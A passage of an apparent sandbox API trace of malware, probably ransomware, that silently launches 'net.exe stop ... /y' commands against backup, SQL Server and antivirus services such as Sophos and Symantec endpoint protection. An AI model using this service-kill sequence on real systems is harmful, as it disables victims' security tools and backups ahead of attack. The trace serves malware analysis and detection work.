(nStdHandle=0xfffffff6) returned 0x0 [0112.656] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.656] GetCurrentProcess () returned 0xffffffff [0112.656] GetCurrentProcess () returned 0xffffffff [0112.656] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x514) returned 1 [0112.656] CloseHandle (hObject=0x4f8) returned 1 [0112.656] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.656] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.656] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.656] CoTaskMemFree (pv=0x741d20) [0112.656] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop sms_site_sql_backup /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2543918 | out: lpCommandLine="\"net.exe\" stop sms_site_sql_backup /y", lpProcessInformation=0x2543918*(hProcess=0x510, hThread=0x4f8, dwProcessId=0x1300, dwThreadId=0x1304)) returned 1 [0112.674] CloseHandle (hObject=0x3e0) returned 1 [0112.675] GetFileType (hFile=0x514) returned 0x3 [0112.675] CloseHandle (hObject=0x4f8) returned 1 [0112.675] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.675] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.675] GetCurrentProcess () returned 0xffffffff [0112.675] GetCurrentProcess () returned 0xffffffff [0112.675] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x51c) returned 1 [0112.675] CloseHandle (hObject=0x4f8) returned 1 [0112.675] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.675] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.675] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.675] CoTaskMemFree (pv=0x741d20) [0112.675] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$BKUPEXEC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x25471dc | out: lpCommandLine="\"net.exe\" stop SQLAgent$BKUPEXEC /y", lpProcessInformation=0x25471dc*(hProcess=0x46c, hThread=0x4a4, dwProcessId=0x1394, dwThreadId=0x1398)) returned 1 [0114.443] CloseHandle (hObject=0x3e0) returned 1 [0114.443] GetFileType (hFile=0x51c) returned 0x3 [0114.443] CloseHandle (hObject=0x4a4) returned 1 [0115.528] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0115.528] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4a4, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0115.528] GetCurrentProcess () returned 0xffffffff [0115.528] GetCurrentProcess () returned 0xffffffff [0115.528] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4f8) returned 1 [0115.528] CloseHandle (hObject=0x4a4) returned 1 [0115.528] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.528] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0115.528] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0115.528] CoTaskMemFree (pv=0x741d20) [0115.529] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$SOPHOS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x26214c0 | out: lpCommandLine="\"net.exe\" stop MSSQL$SOPHOS /y", lpProcessInformation=0x26214c0*(hProcess=0x4a8, hThread=0x4a4, dwProcessId=0x700, dwThreadId=0xfd4)) returned 1 [0115.609] CloseHandle (hObject=0x3e0) returned 1 [0115.609] GetFileType (hFile=0x4f8) returned 0x3 [0115.609] CloseHandle (hObject=0x4a4) returned 1 [0117.362] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.362] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3e0, hWritePipe=0x5a6ef64*=0x478) returned 1 [0117.363] GetCurrentProcess () returned 0xffffffff [0117.363] GetCurrentProcess () returned 0xffffffff [0117.363] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x50c) returned 1 [0117.363] CloseHandle (hObject=0x3e0) returned 1 [0117.363] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.363] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.363] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.363] CoTaskMemFree (pv=0x741d20) [0117.363] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$CITRIX_METAFRAME /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6ee98*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x22845a4 | out: lpCommandLine="\"net.exe\" stop SQLAgent$CITRIX_METAFRAME /y", lpProcessInformation=0x22845a4*(hProcess=0x3cc, hThread=0x3e0, dwProcessId=0xffc, dwThreadId=0xff4)) returned 1 [0117.723] CloseHandle (hObject=0x478) returned 1 [0117.724] GetFileType (hFile=0x50c) returned 0x3 [0117.724] CloseHandle (hObject=0x3e0) returned 1 [0119.016] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0119.016] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x518, hWritePipe=0x5a6ef64*=0x478) returned 1 [0119.017] GetCurrentProcess () returned 0xffffffff [0119.017] GetCurrentProcess () returned 0xffffffff [0119.017] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x528) returned 1 [0119.017] CloseHandle (hObject=0x518) returned 1 [0119.017] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.017] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0119.017] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0119.017] CoTaskMemFree (pv=0x741d20) [0119.017] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop sacsvr /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x265f070 | out: lpCommandLine="\"net.exe\" stop sacsvr /y", lpProcessInformation=0x265f070*(hProcess=0x524, hThread=0x518, dwProcessId=0xdb0, dwThreadId=0xdf4)) returned 1 [0119.442] CloseHandle (hObject=0x478) returned 1 [0119.443] GetFileType (hFile=0x528) returned 0x3 [0119.443] CloseHandle (hObject=0x518) returned 1 [0120.717] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.717] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x518, hWritePipe=0x5a6ef64*=0x478) returned 1 [0120.717] GetCurrentProcess () returned 0xffffffff [0120.717] GetCurrentProcess () returned 0xffffffff [0120.717] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x564) returned 1 [0120.717] CloseHandle (hObject=0x518) returned 1 [0120.717] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.717] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.717] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.717] CoTaskMemFree (pv=0x741d20) [0120.717] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$CXDB /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x268d7fc | out: lpCommandLine="\"net.exe\" stop SQLAgent$CXDB /y", lpProcessInformation=0x268d7fc*(hProcess=0x560, hThread=0x518, dwProcessId=0xfcc, dwThreadId=0x13d0)) returned 1 [0120.723] CloseHandle (hObject=0x478) returned 1 [0120.723] GetFileType (hFile=0x564) returned 0x3 [0120.723] CloseHandle (hObject=0x518) returned 1 [0123.465] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0123.465] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x478, hWritePipe=0x5a6ef64*=0x3cc) returned 1 [0123.465] GetCurrentProcess () returned 0xffffffff [0123.465] GetCurrentProcess () returned 0xffffffff [0123.465] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x50c) returned 1 [0123.465] CloseHandle (hObject=0x478) returned 1 [0123.465] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.465] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0123.465] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0123.465] CoTaskMemFree (pv=0x741d20) [0123.466] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SAVAdminService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2273180 | out: lpCommandLine="\"net.exe\" stop SAVAdminService /y", lpProcessInformation=0x2273180*(hProcess=0x448, hThread=0x478, dwProcessId=0x69c, dwThreadId=0xdec)) returned 1 [0123.530] CloseHandle (hObject=0x3cc) returned 1 [0123.530] GetFileType (hFile=0x50c) returned 0x3 [0123.530] CloseHandle (hObject=0x478) returned 1 [0124.488] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.488] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x478, hWritePipe=0x5a6ef64*=0x3cc) returned 1 [0124.488] GetCurrentProcess () returned 0xffffffff [0124.488] GetCurrentProcess () returned 0xffffffff [0124.488] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x524) returned 1 [0124.488] CloseHandle (hObject=0x478) returned 1 [0124.488] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.488] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.488] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.488] CoTaskMemFree (pv=0x741d20) [0124.488] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$ECWDB2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2549dd8 | out: lpCommandLine="\"net.exe\" stop SQLAgent$ECWDB2 /y", lpProcessInformation=0x2549dd8*(hProcess=0x588, hThread=0x478, dwProcessId=0xd2c, dwThreadId=0x90)) returned 1 [0124.494] CloseHandle (hObject=0x3cc) returned 1 [0124.494] GetFileType (hFile=0x524) returned 0x3 [0124.494] CloseHandle (hObject=0x478) returned 1 [0128.930] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0128.930] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3cc, hWritePipe=0x5a6ef64*=0x444) returned 1 [0128.931] GetCurrentProcess () returned 0xffffffff [0128.931] GetCurrentProcess () returned 0xffffffff [0128.931] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4a4) returned 1 [0128.931] CloseHandle (hObject=0x3cc) returned 1 [0128.931] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.931] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0128.931] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0128.931] CoTaskMemFree (pv=0x741d20) [0128.931] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SAVService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x2272a6c | out: lpCommandLine="\"net.exe\" stop SAVService /y", lpProcessInformation=0x2272a6c*(hProcess=0x51c, hThread=0x3cc, dwProcessId=0x11e4, dwThreadId=0xa6c)) returned 1 [0128.941] CloseHandle (hObject=0x444) returned 1 [0128.941] GetFileType (hFile=0x4a4) returned 0x3 [0128.941] CloseHandle (hObject=0x3cc) returned 1 [0134.019] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.019] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x444, hWritePipe=0x5a6ef64*=0x448) returned 1 [0134.020] GetCurrentProcess () returned 0xffffffff [0134.020] GetCurrentProcess () returned 0xffffffff [0134.020] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4e0) returned 1 [0134.020] CloseHandle (hObject=0x444) returned 1 [0134.020] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.020] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.020] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.021] CoTaskMemFree (pv=0x741d20) [0134.021] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$PRACTTICEBGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2275a90 | out: lpCommandLine="\"net.exe\" stop SQLAgent$PRACTTICEBGC /y", lpProcessInformation=0x2275a90*(hProcess=0x4b0, hThread=0x444, dwProcessId=0x720, dwThreadId=0x874)) returned 1 [0134.310] CloseHandle (hObject=0x448) returned 1 [0134.310] GetFileType (hFile=0x4e0) returned 0x3 [0134.310] CloseHandle (hObject=0x444) returned 1 [0136.101] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0136.101] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x448, hWritePipe=0x5a6ef64*=0x504) returned 1 [0136.102] GetCurrentProcess () returned 0xffffffff [0136.102] GetCurrentProcess () returned 0xffffffff [0136.102] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x554) returned 1 [0136.102] CloseHandle (hObject=0x448) returned 1 [0136.102] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0136.102] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0136.102] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0136.102] CoTaskMemFree (pv=0x741d20) [0136.102] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SepMasterService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x27a6b38 | out: lpCommandLine="\"net.exe\" stop SepMasterService /y", lpProcessInformation=0x27a6b38*(hProcess=0x548, hThread=0x448, dwProcessId=0x4e4, dwThreadId=0x9f4)) returned 1 [0138.232] CloseHandle (hObject=0x504) returned 1 [0138.237] GetFileType (hFile=0x554) returned 0x3 [0138.237] CloseHandle (hObject=0x448) returned 1 [0139.743] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.743] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x518, hWritePipe=0x5a6ef64*=0x4f4) returned 1 [0139.743] GetCurrentProcess () returned 0xffffffff [0139.743] GetCurrentProcess () returned 0xffffffff [0139.743] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x52c) returned 1 [0139.743] CloseHandle (hObject=0x518) returned 1 [0139.743] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.743] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.743] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.744] CoTaskMemFree (pv=0x741d20) [0139.744] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$PRACTTICEMGT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f4, hStdError=0x0), lpProcessInformation=0x2520424 | out: lpCommandLine="\"net.exe\" stop SQLAgent$PRACTTICEMGT /y", lpProcessInformation=0x2520424*(hProcess=0x4e0, hThread=0x518, dwProcessId=0x520, dwThreadId=0x12e8)) returned 1 [0139.755] CloseHandle (hObject=0x4f4) returned 1 [0139.755] GetFileType (hFile=0x52c) returned 0x3 [0139.755] CloseHandle (hObject=0x518) returned 1 [0141.644] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0141.644] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x5a0, hWritePipe=0x5a6ef64*=0x50c) returned 1 [0141.644] GetCurrentProcess () returned 0xffffffff [0141.644] GetCurrentProcess () returned 0xffffffff [0141.644] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x590) returned 1 [0141.645] CloseHandle (hObject=0x5a0) returned 1 [0141.645] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0141.645] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0141.645] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0141.645] CoTaskMemFree (pv=0x741d20) [0141.645] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ShMonitor /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, 